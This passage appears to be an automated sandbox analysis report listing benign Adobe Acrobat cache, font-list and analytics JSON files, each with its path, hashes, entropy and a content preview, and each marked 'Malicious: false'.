Entropy (8bit):	2.7295832789134087
Encrypted:	false
SSDEEP:	3:kkFkl938ZEllXfllXlE/HT8kMlXNNX8RolJuRdxLlGB9lQRYwpDdt:kKnZEl2T8BdNMa8RdWBwRd
MD5:	DDF4C3CF935DC0AA05EB5FF0C3BEED37
SHA1:	E3C31B4B3D01E4F590EEBC8ECB8A9CC86EFA9326
SHA-256:	45D164A0B1C53C2071174C113927CC1ED5F589896FB276FF900B7FAE0184C3E2
SHA-512:	DFF002BED1552CDC0DD6B7EA4990855275F63687B27EA46D6B4405E33DC8C2287B840304E3887C0CAA047DDCCF1899723C35316B53D97C3A0E0EB71B901BB3AB
Malicious:	false
Preview:	p...... .........ZZ/.S..(....................................................... ..........W.....Q..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.1440865988908953
Encrypted:	false
SSDEEP:	6:kKdi9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:7DnLNkPlE99SNxAhUe/3
MD5:	E71E577382EFFC801A9E87E574B355E6
SHA1:	92822FD6D704C201D95F7F069027CD1B9551B2CB
SHA-256:	310D0CC99EC68FC63AA89957ADA055152A0F7ABCB3769C5E365AC2B48E80F7B7
SHA-512:	1ECB8A5E0FC8BABA026DE889DC1B4A519ADDA3D24BD5A331AFAA2CBA70439A35210772D25A02C906FA77B70CCE2EB31FE37EB9AF81FBF19A0A5AC75251B7514E
Malicious:	false
Preview:	p...... ..........B.S..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6760

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	1233
Entropy (8bit):	5.233980037532449
Encrypted:	false
SSDEEP:	24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
MD5:	8BA9D8BEBA42C23A5DB405994B54903F
SHA1:	FC1B1646EC8A7015F492AA17ADF9712B54858361
SHA-256:	862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
SHA-512:	26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.6760

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PostScript document text
Category:	dropped
Size (bytes):	10880
Entropy (8bit):	5.214360287289079
Encrypted:	false
SSDEEP:	192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:	B60EE534029885BD6DECA42D1263BDC0
SHA1:	4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:	B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:	52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:	false
Preview:	%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	data
Category:	dropped
Size (bytes):	227002
Entropy (8bit):	3.392780893644728
Encrypted:	false
SSDEEP:	1536:WKPC4iyzDtrh1cK3XEivK7VK/3AYvYwgF/rRoL+sn:DPCaJ/3AYvYwglFoL+sn
MD5:	87EDBEE38F56C20298F25D5D3D4D1B5C
SHA1:	7F904E9615AC3186A87472EF366DD8202855B0B7
SHA-256:	A46B56D3ABCC137D1872DDF20EED4BCD7D04518282282ADB32DDCCF70D7FFBA6
SHA-512:	BBEBC1FCD5BC9AE042DD5782425BA8C47BF3EAC283B2487FC4E3FF6BF8101306DAB081E5135594165D4DC1AC120FF125AADBC5B3FFE7C646183C04DF77865E0D
Malicious:	false
Preview:	Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.354361250531492
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDsR+xRWMc7+FIbRI6XVW7+0Y8dieoAvJM3g98kUwPeUkwRe9:YvXKXQR+x4yYpW7ndiVGMbLUkee9
MD5:	FFEC3445F7495E42BC0C18F44B8CF5D6
SHA1:	F1E67D785C554CFD57F7B53700D63B614F101A7E
SHA-256:	F3073998E54145118F50B1733368E0188062FD7E43715837F8384CA2D9CBB2E1
SHA-512:	95D14220A7403BC459BDE3D09391A3D2710038842149ACFD2C207188F8B245EA000A725EC82AE73FBD94918CA280F9F853D621846442DDCFD45A67B8B4C7D397
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"48b340bf-4ef8-498b-b4c5-b862d3a59b77","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734892184022,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.2941390445785395
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDsR+xRWMc7+FIbRI6XVW7+0Y8dieoAvJfBoTfXpnrPeUkwRe9:YvXKXQR+x4yYpW7ndiVGWTfXcUkee9
MD5:	8BD2FDB0C5E530DFF4FA0FE5A2354067
SHA1:	8E62F31AED47E360520545249E1108FB5C914D41
SHA-256:	D0A7589609A6597320A586B81A9AAF695A3E07393CC7B41520A2ED2A191831B6
SHA-512:	9E9119646D0CB0F994ECFBA7C75331F370975F30FABE880EFE5DE625DC1CD508F5DE24EFE5C52C1E53D94898D5BAF5AC0AE2EBAB7D0EC6860B537ECF5BF5330D
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"48b340bf-4ef8-498b-b4c5-b862d3a59b77","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734892184022,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	294
Entropy (8bit):	5.272845258805417
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDsR+xRWMc7+FIbRI6XVW7+0Y8dieoAvJfBD2G6UpnrPeUkwRe9:YvXKXQR+x4yYpW7ndiVGR22cUkee9
MD5:	F0CEBFFB4052F84A63F6C53837A51C43
SHA1:	5AA235C8A570C6F230EC67BFADF90C2998FB40B2
SHA-256:	AAA4EEF714F5F36A23EFA1465384651D3E66FF6E30BA1F0052AAAC627580A0B7
SHA-512:	80462D941662C7B9047DC38F8F81E5006788BC99C0EFEB719B73FE108302E08494B8AB29F8597496063F29BB27CD30C25759154903B91E6E6A45DEA815413665
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"48b340bf-4ef8-498b-b4c5-b862d3a59b77","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734892184022,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	285
Entropy (8bit):	5.3329382637718945
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDsR+xRWMc7+FIbRI6XVW7+0Y8dieoAvJfPmwrPeUkwRe9:YvXKXQR+x4yYpW7ndiVGH56Ukee9
MD5:	D754C695D7C7CC67E25BA0A20B2C063B
SHA1:	1FCDDDC29C577DEB2F572322C3F0F7709CC3663F
SHA-256:	F8F9DC9A1EC798BC92C23DF8FD0271455647864B1BEB38EF72A6310445BBEE53
SHA-512:	CAF41718A13DDBA5E9D95B5F6113D79F2885CFBDC566E14183831C799B5B235BB6FA76568E67205EC5D83F6E8825529CAB1454C3815E39900B4600CC52A051F6
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"48b340bf-4ef8-498b-b4c5-b862d3a59b77","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734892184022,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1123
Entropy (8bit):	5.692614837629175
Encrypted:	false
SSDEEP:	24:Yv6XQR+uXilpLgE9cQx8LennAvzBvkn0RCmK8czOCCSx:Yv8uylhgy6SAFv5Ah8cv/x
MD5:	2A963EF30B62D4C1D4DE579560963DFD
SHA1:	CEE4A8BD77D0E43B630F047325016803ACB6603F
SHA-256:	ECCB89B7EDA943397EB9A1B1DB2CA6ED46943A7B6C2F880B365DE54F321311D4
SHA-512:	D79DD85FFCE7E093F915DBD6062E5020F6E8A900D218EEC411F45E0D598A564317746A5DB7F2B0B6B191632032C66E1EBFC280377A2583EBFA441240D3A45099
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"48b340bf-4ef8-498b-b4c5-b862d3a59b77","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734892184022,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.280462961484356
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDsR+xRWMc7+FIbRI6XVW7+0Y8dieoAvJf8dPeUkwRe9:YvXKXQR+x4yYpW7ndiVGU8Ukee9
MD5:	3BDD9C10B9FDC31262E9E8C6E6BA9322
SHA1:	DC5AF94AE4D06573B83F5FD76B8C37E0BC77A384
SHA-256:	BF1E9E809163DA3055F0C6A7B18E9D7F3D376F5159DCCCF685BC24D0566DA3F2
SHA-512:	3171D290904A72D609EEFBFB59136213E18BEDB38395948775B01497AF6E4623C59AC2E97D97FF3F9B3ACE273766058452FECE83544E278834F7DBDBBD315996
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"48b340bf-4ef8-498b-b4c5-b862d3a59b77","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734892184022,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.28161888591465
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDsR+xRWMc7+FIbRI6XVW7+0Y8dieoAvJfQ1rPeUkwRe9:YvXKXQR+x4yYpW7ndiVGY16Ukee9
MD5:	7F5DB64FEA628322BFBB2114284D6BA8
SHA1:	A662CEA126357FE789B923CA6126A9773FFC5654
SHA-256:	B868692E7594EDBADD695E2B502286C67F742690D8789F8C4523EAB50BFB86A5
SHA-512:	22FB9453CA66F85C88FBF81E77626843946641A6C265A6A78F161C14C0A4E8C4DD243C9B8FC30E391652795D5F2ED2143E48C47679BAA22E64B3E4611F9E6E1E
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"48b340bf-4ef8-498b-b4c5-b862d3a59b77","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734892184022,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.30148515262797
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDsR+xRWMc7+FIbRI6XVW7+0Y8dieoAvJfFldPeUkwRe9:YvXKXQR+x4yYpW7ndiVGz8Ukee9
MD5:	16493EC6FBAE388A295E17264342C3B2
SHA1:	92A3184C22A4F5BD416095B982A0FBD4FAD233C0
SHA-256:	AF4DA0AC00F74D4876166BA981774D62EC273BD9D0EC1ADCD76A3FBFE87DDE8E
SHA-512:	7C24DA86ECEE93CA807140BBD8A61904E9A0D64046C4F7F0DA1D4A4888D55549485AB18B44F25E84338CFFA354371FE2268D8F54DB3DF8F72CF5635810C9B6E3
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"48b340bf-4ef8-498b-b4c5-b862d3a59b77","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734892184022,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	295
Entropy (8bit):	5.308112576076743
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDsR+xRWMc7+FIbRI6XVW7+0Y8dieoAvJfzdPeUkwRe9:YvXKXQR+x4yYpW7ndiVGb8Ukee9
MD5:	E4404B9C56B15ACE8A72FEAE85E3B4A4
SHA1:	C8B373A52491170153437FB6F99BDA2B403979AB
SHA-256:	03D6089DC20EBDD21F8FEAAC00887401B22B205E49362D2415A29718323D2BB6
SHA-512:	8930C2EE3373BC3969D8D34247E66CDA0C47365F5934FA7CA27EEDFAFA9216DB45D144B7D2625D418FE33195C340340822A0305F8C7DF1C8923576BAD9DA134E
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"48b340bf-4ef8-498b-b4c5-b862d3a59b77","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734892184022,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	289
Entropy (8bit):	5.28822891507015
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDsR+xRWMc7+FIbRI6XVW7+0Y8dieoAvJfYdPeUkwRe9:YvXKXQR+x4yYpW7ndiVGg8Ukee9
MD5:	1EF38ADF275E10A725A61A1BAA5B4D3B
SHA1:	2941E3FBA72A47151992028951311B591D6704E4
SHA-256:	4F91542C3753D08CAED1EB6AD2399B0EF968942B3D60F75BC176FE3D82F668FF
SHA-512:	D5B6C359EF8FA3904BFD0E99F13EEB10AC45AADDCC240F3ACAC2512191B6F8882ECF0D5DE7BD530619AA010475AA242A7D09EFA2F331BAD573165E0923C4ECA9
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"48b340bf-4ef8-498b-b4c5-b862d3a59b77","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734892184022,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	5.274072050482286
Encrypted:	false
SSDEEP:	6:YEQXJ2HXDsR+xRWMc7+FIbRI6XVW7+0Y8dieoAvJf+dPeUkwRe9:YvXKXQR+x4yYpW7ndiVG28Ukee9
MD5:	5578572B5FA701467BE4CC9DFB70979A
SHA1:	C0C3F50115558966B176B3CC7AD9580560CA4D37
SHA-256:	8A7436E95C7D00333DAC99216582D60305FCD8920E9A7C3A537F361B07533F1B
SHA-512:	176C18F2D32FED8A2623287B0253563510A4BB2179F97B65D9450C939153E63B49F44F76D02494A1051EBEE9813C0BE09ABD1D320C843CB722E687B5517A7665
Malicious:	false
Preview:	{"analyticsData":{"responseGUID":"48b340bf-4ef8-498b-b4c5-b862d3a59b77","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734892184022,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

